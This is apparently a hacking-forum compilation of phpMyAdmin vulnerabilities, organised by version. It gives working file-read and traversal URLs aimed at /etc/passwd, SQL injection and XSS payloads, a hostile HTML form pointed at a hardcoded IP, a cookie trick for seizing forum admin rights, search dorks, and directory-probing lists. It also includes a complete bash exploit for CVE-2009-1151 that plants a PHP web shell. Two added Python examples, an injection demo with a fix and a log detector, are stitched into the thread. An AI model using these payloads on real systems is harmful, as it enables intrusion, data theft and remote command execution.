Vulnerability

2.2.0rc3
Code:
http://victim/phpmyadmin/tbl_copy.php?db=test&table=haxor&new_name=test.haxor2&strCopyTableOK=".passthru('cat%20/etc/passwd')."
The exploit gives arbitrary code execution.

2.3.2
Code:
http://target.com/phpMyAdmin/tbl_properties_structure.php?lang=<SQL INJECTION>
SQL injection

2.5.*
phpMyAdmin 2.5.7 Remote code injection Exploit
The exploit gives arbitrary code execution.

2.5.5-pl1 and prior
Code:
http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00
The exploit gives file read / arbitrary code execution.

2.6.4-pl1
phpMyAdmin 2.6.4-pl1 Remote Directory Traversal Exploit
The exploit gives reading of any file.

HTML-Exploit:
HTML:
<CENTER>
<A HREF="http://www.securityreason.com"><IMG SRC="http://securityreason.com/gfx/small_logo.png"></A><P>
<FORM action="http://74.69.111.236:4681/phpmyadmin/libraries/grab_globals.lib.php" method=post enctype="multipart/form-data">
<input TYPE="hidden" name="usesubform[1]" value="1">
<input TYPE="hidden" name="usesubform[2]" value="1">
<input TYPE="text" name="subform[1][redirect]" value="../../../../../../../etc/passwd" size=30> File<p>
<input TYPE="hidden" name="subform[1][cXIb8O3]" value="1">
<input TYPE="submit" value="Exploit">
</FORM>

2.7.0
Code:
http://victim/phpmyadmin/server_privileges.php?server=1&checkprivs='
http://victim/phpmyadmin/server_privileges.php?server=1&hostname='&username=1&dbname=1&tablename=1
SQL injection

2.11.2
SQL injection + XSS
Code:
November 12, 2007
Program: phpMyAdmin 2.11.2, possibly earlier versions
Danger: Low
Exploit available: No
Description: The discovered vulnerabilities allow a remote user to carry out an XSS attack and execute arbitrary SQL commands in the application's database.
1. The vulnerability exists because of insufficient sanitization of input passed in the "db" parameter of the db_create.php script. A remote user can, with a specially crafted request, execute arbitrary script code in the victim's browser in the security context of the vulnerable site. For successful exploitation the attacker must have the CREATE DATABASE privilege and the victim's browser must execute JavaScript inside an img tag (Opera, for example).
2. The vulnerability exists because of insufficient sanitization of input passed in the "db" parameter of the db_create.php script. A remote user can, with a specially crafted request, execute arbitrary SQL commands in the application's database. For successful exploitation the attacker must have the CREATE DATABASE privilege.

other:
Code:
http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00
http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00
http://www.example.com/phpMyAdmin/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No

XSS (Cross-site Scripting):

2.6.0-pl2 and prior
Code:
http://[target]/[phpMyAdmin_directory]/main.php?"><script>alert(document.cookie)</script></
http://[target]/[phpMyAdmin_directory]/read_dump.php?sql_query=set%20@1=1&zero_rows=<script>alert(document.cookie)</script>

prior to 2.6.2-rc1
Code:
http://[target]/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><script>alert(document.cookie)</script>
http://[target]/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><h1>XSS</h1>

2.8.0.1
Code:
http://example.com/?convcharset=%22%20STYLE=%22background-image:%20url(javascript:alert('XSS'))%22%20r=%22
index.php?set_theme=%3Cscript%3Ealert('Powered By Expaethitec');%3C/script%3E

2.9.x
Code:
http://site.com/phpmyadmin/sql.php?db=information_schema&token=your_token&goto=db_details_structure.php&table=CHARACTER_SETS&pos=[xss]

other:
Code:
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS
http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code]
http://www.example.com/phpMyAdmin/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS]
http://www.example.com/phpMyAdmin/themes/original/css/theme_right.css.php?right_font_family=[XSS]
/phpmyadmin/db_create.php?token=your_token&reload=1&db=[double xss(2 followed xss)]
/phpmyadmin/db_operations.php?db_collation=latin1_swedish_ci&db_copy=true&db=prout&token=your_token&newname=[xss]
/phpmyadmin/querywindow.php?token=your_token&db=&table=&query_history_latest=[xss]&query_history_latest_db=[xss]&querydisplay_tab=[xss]

Full path disclosure:
Code:
/scripts/check_lang.php
/themes/darkblue_orange/layout.inc.php
/index.php?lang[]=
/index.php?target[]=
/index.php?db[]=
/index.php?goto[]=
/left.php?server[]=
/index.php?table[]=
/server_databases.php?token=your_token&sort_by="
/index.php?db=information_schema&token=your_token&tbl_group[]=
/db_printview.php?db="
/sql.php?back[]=
libraries/string.lib.php
libraries/storage_engines.lib.php
libraries/sqlparser.lib.php
libraries/sql_query_form.lib.php
libraries/select_theme.lib.php
libraries/select_lang.lib.php
libraries/relation_cleanup.lib.php
libraries/left_header.inc.php
libraries/import.lib.php
libraries/header_meta_style.inc.php
libraries/grab_globals.lib.php
libraries/get_foreign.lib.php (get_foreign.lib.php?field=foo&foreigners[foo]=foo)
libraries/display_tbl_links.lib.php (display_tbl_links.lib.php?doWriteModifyAt=left&edit_url=foo)
libraries/display_import.lib.php
libraries/display_export.lib.php
libraries/display_create_table.lib.php
libraries/display_create_database.lib.php
libraries/db_table_exists.lib.php
libraries/database_interface.lib.php
libraries/common.lib.php
libraries/check_user_privileges.lib.php
libraries/charset_conversion.lib.php (charset_conversion.lib.php?cfg[AllowAnywhereRecoding]=true&allow_recoding=true)
libraries/sqlvalidator.lib.php (libraries/sqlvalidator.lib.php?cfg[SQLValidator]=use=TRUE)
libraries/import/sql.php
libraries/fpdf/ufpdf.php
libraries/auth/cookie.auth.lib.php (libraries/auth/cookie.auth.lib.php?coming_from_common=true)

dork:
Code:
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
intitle:"index of/phpmyadmin"
phpMyAdmin "running on" inurl:"main.php"
phpMyAdmin dumps
"phpMyAdmin" "running on" inurl:"main.php"
filetype:txt | filetype:sql ("phpMyAdmin SQL Dump"|"phpMyAdmin MySQL-Dump")
intitle:"index of /phpmyadmin" -tar
allinurl:/tbl_properties_structure.php?
inurl:main.php "Welcome to phpMyadmin" -"No Privileges" +"runtime" -"as root@"
http://www.google.com/search?hl=en&lr=&c2coff=1&q=intext:"welcome to phpmyadmin" -login -"no privileges"
"Create new database [Documentation]" inurl:phpmyadmin -demo

Files locations
Code:
/phpm/ /phpmy/ /phpmyadmin/ /PMA/ /mysql/ /admin/ /db/ /dbadmin/ /web/phpMyAdmin/ /admin/pma/
/admin/phpmyadmin/ /admin/mysql/ /phpmyadmin2/ /mysqladmin/ /mysql-admin/ /phpMyAdmin-2.5.6/ /phpMyAdmin-2.5.4/
/phpMyAdmin-2.5.1/ /phpMyAdmin-2.2.3/ /phpMyAdmin-2.2.6/ /myadmin/ /phpMyA/ /phpmyad/ /phpMyAdmin-2.6.0/
/phpMyAdmin-2.6.0-pl1/ /phpMyAdmin-2.6.3-pl1/ /phpMyAdmin-2.6.3/ /phpMyAdmin-2.6.3-rc1/ /phpMyAdmin-2.6.2-rc1/
/phpMyAdmi/ /phpMyAdmin1/ /phpMyAdmin2/ /phpMyAdmin-2/ /phpMyAdmin-2.10.0/
/phpMyAdmin-2.3.0/ /phpMyAdmin-2.3.1/ /phpMyAdmin-2.3.2/ /phpMyAdmin-2.3.3/ /phpMyAdmin-2.3.4/
/phpMyAdmin-2.3.5/ /phpMyAdmin-2.3.6/ /phpMyAdmin-2.3.7/ /phpMyAdmin-2.3.8/ /phpMyAdmin-2.3.9/
/phpMyAdmin-2.4.0/ /phpMyAdmin-2.4.1/ /phpMyAdmin-2.4.2/ /phpMyAdmin-2.4.3/ /phpMyAdmin-2.4.4/
/phpMyAdmin-2.4.5/ /phpMyAdmin-2.4.6/ /phpMyAdmin-2.4.7/ /phpMyAdmin-2.4.8/ /phpMyAdmin-2.4.9/
/phpMyAdmin-2.5.0/ /phpMyAdmin-2.5.1/ /phpMyAdmin-2.5.2/ /phpMyAdmin-2.5.3/ /phpMyAdmin-2.5.4/
/phpMyAdmin-2.5.5/ /phpMyAdmin-2.5.6/ /phpMyAdmin-2.5.7/ /phpMyAdmin-2.5.8/ /phpMyAdmin-2.5.9/
/phpMyAdmin-2.6.0/ /phpMyAdmin-2.6.1/ /phpMyAdmin-2.6.2/ /phpMyAdmin-2.6.3/ /phpMyAdmin-2.6.4/
/phpMyAdmin-2.6.5/ /phpMyAdmin-2.6.6/ /phpMyAdmin-2.6.7/ /phpMyAdmin-2.6.8/ /phpMyAdmin-2.6.9/
/phpMyAdmin-2.7.0/ /phpMyAdmin-2.7.1/ /phpMyAdmin-2.7.2/ /phpMyAdmin-2.7.3/ /phpMyAdmin-2.7.4/
/phpMyAdmin-2.7.5/ /phpMyAdmin-2.7.6/ /phpMyAdmin-2.7.7/ /phpMyAdmin-2.7.8/ /phpMyAdmin-2.7.9/
/phpMyAdmin-2.8.1/ /phpMyAdmin-2.8.2/ /phpMyAdmin-2.8.3/ /phpMyAdmin-2.8.4/ /phpMyAdmin-2.8.5/
/phpMyAdmin-2.8.6/ /phpMyAdmin-2.8.7/ /phpMyAdmin-2.8.8/ /phpMyAdmin-2.8.9/ /phpMyAdmin-2.9.1/
/phpMyAdmin-2.9.2/ /phpMyAdmin-3/ /phpMyAdmin-4/ /phpMyAds/ /phpmyad-sys/

phpMyAdmin security announcement
SQL injection (Delayed Cross Site Request Forgery) <= v2.11.5

Usage example: we have a site with phpmyadmin on it (by the way, it doesn't much matter where, the main thing is that it's installed and the admin logs into it), a forum (IPB for example) and a script vulnerable to stored XSS (for example, let's take a theoretical stored XSS in IPB private messages). We send the admin the code with the XSS (it's important to know the table prefix used on the forum).
Code:
PHP:
<script>
document.cookie="sql_query=update ibf_members set mgroup=4 where id=31337; path=/; expires=Mon, 01-Jan-2009 00:00:00 GMT";
</script>
ibf_ - the forum prefix
4 - the admin group
31337 - our id on the forum
After "infecting" the admin with the XSS all that's left is to wait for him to log into phpmyadmin. There the SQL query the admin runs will be rewritten and will make us a forum admin (with this value of the sql_query parameter). To keep it low-profile you can "play" with the expires parameter.
PS at the moment practically all phpmyadmins are vulnerable (they haven't had time to update, heh)
A couple more XSS; they work in version 2.6.1, the latest versions are not vulnerable:
Code:
http://site/phpMyAdmin/index.php?GLOBALS[cfg][PmaAbsoluteUri]="><script>alert(5555)</script>
Code:
http://site/phpMyAdmin/calendar.php?GLOBALS[cfg][PmaAbsoluteUri]="><script>alert(5555)</script>
etc. register_globals and magic_quotes don't matter
Code:
http://localhost/Tools/phpMyAdmin/mult_submits.inc.php?submit_mult=1&what=1&strDoYouReally=<script>alert(5555)</script>
register_globals on
In theory this script is vulnerable in the latest versions too, but it's been moved into libraries and changed a bit; in 2.11.5 it's exploited like this:
Code:
http://localhost/Tools/phpMyAdmin/libraries/mult_submits.inc.php?submit_mult=1&what="><script>alert(5555)</script>
but I think in the latest versions access to the script is denied by default, via .htaccess
It is a variable that was not cleaned in a way, allowing you to inject SQL code into the cookie. Here is an example of a small vulnerable PHP script.
PHP:
<?php
$user['id'] = $_COOKIE['uid'];
$query = "SELECT name, password FROM members where uid='" . $user['id'] . "'";
$query = mysql_query($query);
$name = mysql_result($query, 0);
echo 'Hello ' . $name . '!';
?>
If it is a normal user, it would display a perfectly good name like "Hello Admin!". You can now use a thing such as the extension for Firefox called Cookie Editor, and modify the cookie; you can also do this with JavaScript. You then edit the cookie's value: it would have been something like "12", but after editing and adding SQL code to it, it would be something like "-1 UNION ALL SELECT USER(), NULL FROM mysql.user--". That will change the query, and display the user connected to the database, instead of the name of the user stored in the database. That will result in the following being echoed: "Hello root@localhost".
(c) h4cky0u
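The cookie-driven injection from the post above, reproduced as an added example (not the post's own code) against an in-memory SQLite table with constructed rows: the concatenating lookup sits beside a parameterized, input-validated one. SQLite has no USER() or mysql.user, so the UNION branch of the adapted payload returns a marker literal instead, and the quote that closes the uid='...' literal is spelled out.

```python
import sqlite3

# Constructed stand-in for the post's `members` table (not real data).
SCHEMA = """
CREATE TABLE members (uid INTEGER PRIMARY KEY, name TEXT, password TEXT);
INSERT INTO members VALUES (12, 'Admin', 'hash-of-admin-password');
INSERT INTO members VALUES (13, 'Bob',   'hash-of-bob-password');
"""


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def greet_vulnerable(conn: sqlite3.Connection, cookie_uid: str):
    """Same shape as the PHP snippet: the raw cookie value is spliced into
    the SQL text, so it can close the quoted literal and append a UNION.
    Returns the greeting name (what mysql_result($query, 0) yielded)."""
    sql = "SELECT name, password FROM members WHERE uid='" + cookie_uid + "'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def greet_fixed(conn: sqlite3.Connection, cookie_uid: str):
    """Hardened form: validate the shape first (a uid is only ever digits),
    then bind the value as a parameter so it is treated as data, never SQL."""
    if not cookie_uid.isdigit():
        return None
    sql = "SELECT name, password FROM members WHERE uid=?"
    row = conn.execute(sql, (int(cookie_uid),)).fetchone()
    return row[0] if row else None


# The post's payload adapted to SQLite (no USER(), no mysql.user): the UNION
# branch supplies a marker string in the `name` column. The leading quote
# closes uid='...', and `--` comments out the trailing quote the code appends.
INJECTED_COOKIE = "-1' UNION ALL SELECT 'attacker-controlled', NULL FROM members--"

if __name__ == "__main__":
    db = open_db()
    print("normal cookie, vulnerable:  ", greet_vulnerable(db, "12"))
    print("injected cookie, vulnerable:", greet_vulnerable(db, INJECTED_COOKIE))
    print("injected cookie, fixed:     ", greet_fixed(db, INJECTED_COOKIE))
```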
Vulnerable:
Code:
Typo3 phpMyAdmin 3.2
Typo3 phpMyAdmin 3.0.1
Typo3 phpMyAdmin 3.0
Typo3 phpMyAdmin 0.2.2
Turbolinux Appliance Server 3.0 x64
Turbolinux Appliance Server 3.0
phpMyAdmin phpMyAdmin 2.11.9
phpMyAdmin phpMyAdmin 2.11.8
phpMyAdmin phpMyAdmin 2.11.7
phpMyAdmin phpMyAdmin 2.11.5 1
phpMyAdmin phpMyAdmin 2.11.5
phpMyAdmin phpMyAdmin 2.11.4
phpMyAdmin phpMyAdmin 2.11.1
phpMyAdmin phpMyAdmin 2.9.1
phpMyAdmin phpMyAdmin 2.9.2-rc1
phpMyAdmin phpMyAdmin 2.9.1.1
phpMyAdmin phpMyAdmin 2.11.8.1
phpMyAdmin phpMyAdmin 2.11.5.2
phpMyAdmin phpMyAdmin 2.11.2.2
phpMyAdmin phpMyAdmin 2.11.2.1
phpMyAdmin phpMyAdmin 2.11.1.2
phpMyAdmin phpMyAdmin 2.11.1.1
phpMyAdmin phpMyAdmin 2.10.0.2
phpMyAdmin phpMyAdmin 2.10.0.1

Exploit:
Code:
http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]
Execution of arbitrary PHP code on the server, including invoking external commands through the PHP exec() function.
Solution: Upgrade to phpMyAdmin 2.11.9.1 or newer.

Not Vulnerable:
Code:
Typo3 phpMyAdmin 3.3
phpMyAdmin phpMyAdmin 2.11.9.1
www.phpmyadmin.net
phpMyAdmin 3.1.0 (XSRF) SQL Injection Vulnerability
http://www.milw0rm.com/exploits/7382
2.10.0.2 XSS
Code:
http://[server]/main.php?reload=1&message=aa&sql_query=[XSS]&token=[SID]
http://[server]/server_privileges.php?token=[SID]&username=[XSS]
http://[server]/sql.php?db=information_schema&token=[SID]&goto=db_structure.php&table=KEY_COLUMN_USAGE&pos=[XSS]
http://[server]/sql.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30[XSS]&disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`
http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4[XSS]
http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=[XSS]&unlim_num_rows=4&single_table=true
http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0[XSS]&session_max_rows=30&disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4&single_table=true
Original: http://downloads.securityfocus.com/vulnerabilities/exploits/25268.html
I'd also add: it works on MySQL 4. On 5 it doesn't work. At least not for me. Just tested it.) (good thing that where it matters there's a 4))))
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
Code:
#!/bin/bash
# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11
# by pagvac (gnucitizen.org), 4th June 2009.
# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,
# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!
# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)
# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the '/config/' directory
# within the '/phpMyAdmin/' directory. this is because this directory is
# where '/scripts/setup.php' tries to create 'config.inc.php' which is where
# our evil PHP code is injected 8)
# more info on:
# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
# http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/

if [[ $# -ne 1 ]]
then
    echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
    echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
    exit
fi

if ! which curl >/dev/null
then
    echo "sorry but you need curl for this script to work!"
    echo "on Debian/Ubuntu: sudo apt-get install curl"
    exit
fi

function exploit {
    postdata="token=$1&action=save&configuration="\
"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\
"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\
"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\
"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

    postdata2="token=$1&action=save&configuration=a:1:"\
"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\
"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\
"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\
"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22"\
"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:"\
"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config"\
"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

    flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"

    echo "[+] attempting to inject phpinfo() ..."
    curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup.php" >/dev/null

    if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null
    then
        curl -ks --url "$3/config/config.inc.php" >$flag
        echo "[+] success! phpinfo() injected successfully! output saved on $flag"
        curl -ks -b $2 -d $postdata2 --url "$3/scripts/setup.php" >/dev/null
        echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"
        echo " $3/config/config.inc.php?c=ls+-l+/"
        echo " $3/config/config.inc.php?p=phpinfo();"
        echo " please send any feedback/improvements for this script to"\
"unknown.pentester<AT_sign__here>gmail.com"
    else
        echo "[+] no luck injecting to $3/config/config.inc.php :("
        exit
    fi
} # end of exploit function

cookiejar="/tmp/$(basename $0).$RANDOM.txt"
token=`curl -ks -c $cookiejar --url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`

echo "[+] checking if phpMyAdmin exists on URL provided ..."
#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null
if grep phpMyAdmin $cookiejar &>/dev/null
then
    length=`echo -n $token | wc -c`
    # valid form token obtained?
    if [[ $length -eq 32 ]]
    then
        echo "[+] phpMyAdmin cookie and form token received successfully. Good!"
        # attempt exploit!
        exploit $token $cookiejar $1
    else
        echo "[+] could not grab form token. you might want to try exploiting the vuln manually :("
        exit
    fi
else
    echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"
    exit
fi

# milw0rm.com [2009-06-09]
CVE-2009-1151 (phpmyadminrcesh.txt)
PMASA-2009-3
PMASA-2009-4
Code:
<?php
/*
 * Generated configuration file
 * Generated by: phpMyAdmin 3.0.1.1 setup script by Michal Čihař <[email protected]>
 * Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $
 * Date: Tue, 09 Jun 2009 14:13:34 GMT
 */

/* Servers configuration */
$i = 0;

/* Server (config:root) [1] */
$i++;
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo '<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo '<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
/* End of servers configuration */
?>

phpMyAdmin//config/config.inc.php?c=ls+-l+/
phpMyAdmin//config/config.inc.php?p=phpinfo();

Vulnerable software and versions:
phpmyadmin:3.1.3 phpmyadmin:3.1.3:rc1 phpmyadmin:3.1.2 phpmyadmin:3.1.2:rc1 phpmyadmin:3.1.1 phpmyadmin:3.1.1:rc1 phpmyadmin:3.1.0
phpmyadmin:2.11.9.3 phpmyadmin:2.11.9.4 phpmyadmin:2.11.9.2 phpmyadmin:2.11.9.1 phpmyadmin:2.11.9.0 phpmyadmin:2.11.9
phpmyadmin:2.11.8 phpmyadmin:2.11.7.1 phpmyadmin:2.11.7.0 phpmyadmin:2.11.7
phpmyadmin:2.11.6:rc1 phpmyadmin:2.11.6.0 phpmyadmin:2.11.6
phpmyadmin:2.11.5:rc1 phpmyadmin:2.11.5.2 phpmyadmin:2.11.5.1 phpmyadmin:2.11.5.0 phpmyadmin:2.11.5
phpmyadmin:2.11.4:rc1 phpmyadmin:2.11.4 phpmyadmin:2.11.3:rc1 phpmyadmin:2.11.3.0 phpmyadmin:2.11.3
phpmyadmin:2.11.2.2 phpmyadmin:2.11.2.1 phpmyadmin:2.11.2.0 phpmyadmin:2.11.2
phpmyadmin:2.11.1:rc1 phpmyadmin:2.11.1.2 phpmyadmin:2.11.1.1 phpmyadmin:2.11.1.0 phpmyadmin:2.11.1
phpmyadmin:2.11.0:rc1 phpmyadmin:2.11.0:beta1 phpmyadmin:2.11.0
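A defender-side companion to the server_databases.php sort_by exploit and the setup.php / config.inc.php chain above, and to the cfg-override, traversal and XSS URLs earlier in the thread: an added example (not from the thread or from phpMyAdmin) that runs a handful of detection rules over constructed Apache combined-log lines mirroring those vectors. Rule names and sample lines are my own; note that the CVE-2009-1151 payload travels in a POST body, so the access log shows only the POST to the setup script, while the later requests to config/config.inc.php are fully visible.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Apache combined log up to the size field; referer and user-agent are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def decoded_query(target: str) -> str:
    """Query string decoded twice: several payloads in the thread are
    double-encoded (%2522, %253C ...) to slip past one round of decoding."""
    return unquote_plus(unquote_plus(urlsplit(target).query))


# (rule name, predicate over method, path, decoded query). Names are mine.
RULES = [
    # CVE-2009-1151: the serialized config goes in the POST body, so a POST
    # to the setup script is the only log-visible trace of the injection.
    ("pma-setup-save-post",
     lambda m, p, q: m == "POST" and p.endswith("/scripts/setup.php")),
    # The injected config.inc.php is then driven with ?c= / ?p=; a direct
    # request for that file is never part of normal phpMyAdmin use.
    ("pma-config-inc-direct",
     lambda m, p, q: p.endswith("/config/config.inc.php")),
    # server_databases.php sort_by code injection (fixed in 2.11.9.1).
    ("pma-sort_by-code-injection",
     lambda m, p, q: p.endswith("/server_databases.php")
     and re.search(r'sort_by=[^&]*("\]\)|exec\(|system\()', q) is not None),
    # cfg[...] / GLOBALS[cfg] overrides behind the old register_globals bugs.
    ("pma-cfg-override",
     lambda m, p, q: re.search(r'(^|&)(GLOBALS\[cfg\]|cfg\[)', q) is not None),
    # export.php / css.php file-read vectors: traversal plus a NUL terminator.
    ("pma-traversal-or-nul",
     lambda m, p, q: "\x00" in q or "../" in q),
    # Reflected XSS vectors (convcharset, PmaAbsoluteUri, pos, ...).
    ("pma-reflected-script",
     lambda m, p, q: re.search(r'<\s*script|javascript:', q, re.I) is not None),
]


def scan(lines):
    """Return [(line_no, client_ip, [matched rule names])] for lines that
    trip at least one rule. Lines that do not parse are skipped."""
    findings = []
    for no, line in enumerate(lines, start=1):
        m = LOG_RE.match(line)
        if not m:
            continue
        method, target = m["method"], m["target"]
        path, query = urlsplit(target).path, decoded_query(target)
        names = [name for name, pred in RULES if pred(method, path, query)]
        if names:
            findings.append((no, m["ip"], names))
    return findings


# Constructed sample traffic mirroring the thread's vectors (not real logs).
SAMPLE_LOG = [
    '203.0.113.5 - - [09/Jun/2009:14:13:34 +0000] "POST /phpMyAdmin/scripts/setup.php HTTP/1.1" 200 1532 "-" "curl/7.18.2"',
    '203.0.113.5 - - [09/Jun/2009:14:13:35 +0000] "GET /phpMyAdmin/config/config.inc.php?c=ls+-l+/ HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [09/Jun/2009:14:20:01 +0000] "GET /phpMyAdmin/server_databases.php?pos=0&dbstats=0&sort_by=%22%5D%29+OR+exec%28%27id%27%29%3B+//&sort_order=desc&token=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [09/Jun/2009:14:21:10 +0000] "GET /phpMyAdmin/index.php?lang=en-utf-8&token=abc HTTP/1.1" 200 4100 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [09/Jun/2009:14:22:45 +0000] "GET /phpMyAdmin/export.php?what=../../../../../../etc/passwd%00 HTTP/1.1" 200 1800 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [09/Jun/2009:14:23:02 +0000] "GET /phpMyAdmin/index.php?GLOBALS[cfg][PmaAbsoluteUri]=%2522%253E%253Cscript%253Ealert%25281%2529%253C/script%253E HTTP/1.1" 200 4100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for no, ip, names in scan(SAMPLE_LOG):
        print(f"line {no} {ip}: {', '.join(names)}")
```

Line 4 is ordinary traffic and trips nothing; the remaining lines each map to the vector they were built from.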
Regarding full path disclosure: in recent versions there is a phpinfo.php file in the PMA root with the corresponding content, and as a rule admins don't delete it.
Files locations
Code:
/php-my-admin/ /phpMyAdmin-2.5.5-rc1/ /phpMyAdmin-2.5.5-rc2/ /phpMyAdmin-2.5.5-pl1/ /phpMyAdmin-2.5.6-rc1/
/phpMyAdmin-2.5.6-rc2/ /phpMyAdmin-2.5.7-pl1/ /phpMyAdmin-2.6.0-alpha/ /phpMyAdmin-2.6.0-alpha2/ /phpMyAdmin-2.6.0-beta1/
/phpMyAdmin-2.6.0-beta2/ /phpMyAdmin-2.6.0-rc1/ /phpMyAdmin-2.6.0-rc2/ /phpMyAdmin-2.6.0-rc3/ /phpMyAdmin-2.6.0-pl2/
/phpMyAdmin-2.6.0-pl3/ /phpMyAdmin-2.6.1-rc1/ /phpMyAdmin-2.6.1-rc2/ /phpMyAdmin-2.6.1/ /phpMyAdmin-2.6.1-pl1/
/phpMyAdmin-2.6.1-pl2/ /phpMyAdmin-2.6.1-pl3/ /phpMyAdmin-2.6.2-beta1/ /phpMyAdmin-2.6.2-pl1/ /phpMyAdmin-2.6.4-rc1/
/phpMyAdmin-2.6.4-pl1/ /phpMyAdmin-2.6.4-pl2/ /phpMyAdmin-2.6.4-pl3/ /phpMyAdmin-2.6.4-pl4/ /phpMyAdmin-2.7.0-beta1/
